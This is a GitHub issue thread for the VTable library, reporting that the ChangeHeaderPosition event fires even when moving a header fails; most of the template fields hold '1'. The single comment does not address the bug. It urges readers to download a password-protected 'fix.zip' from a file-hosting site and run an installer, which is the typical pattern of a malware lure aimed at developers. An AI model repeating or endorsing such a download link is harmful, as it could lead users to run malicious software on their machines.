### ISSUE TITLE
[Bug] ChangeHeaderPosition event should not be trigger, when move header postion failed

### ISSUE THREAD

**Issue by fangsmile** [VisActor/VTable#2299]
### Version

develop

### Link to Minimal Reproduction

1

### Steps to Reproduce

1

### Current Behavior

1

### Expected Behavior

1

### Environment

```markdown
- OS:
- Browser:
- Framework:
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
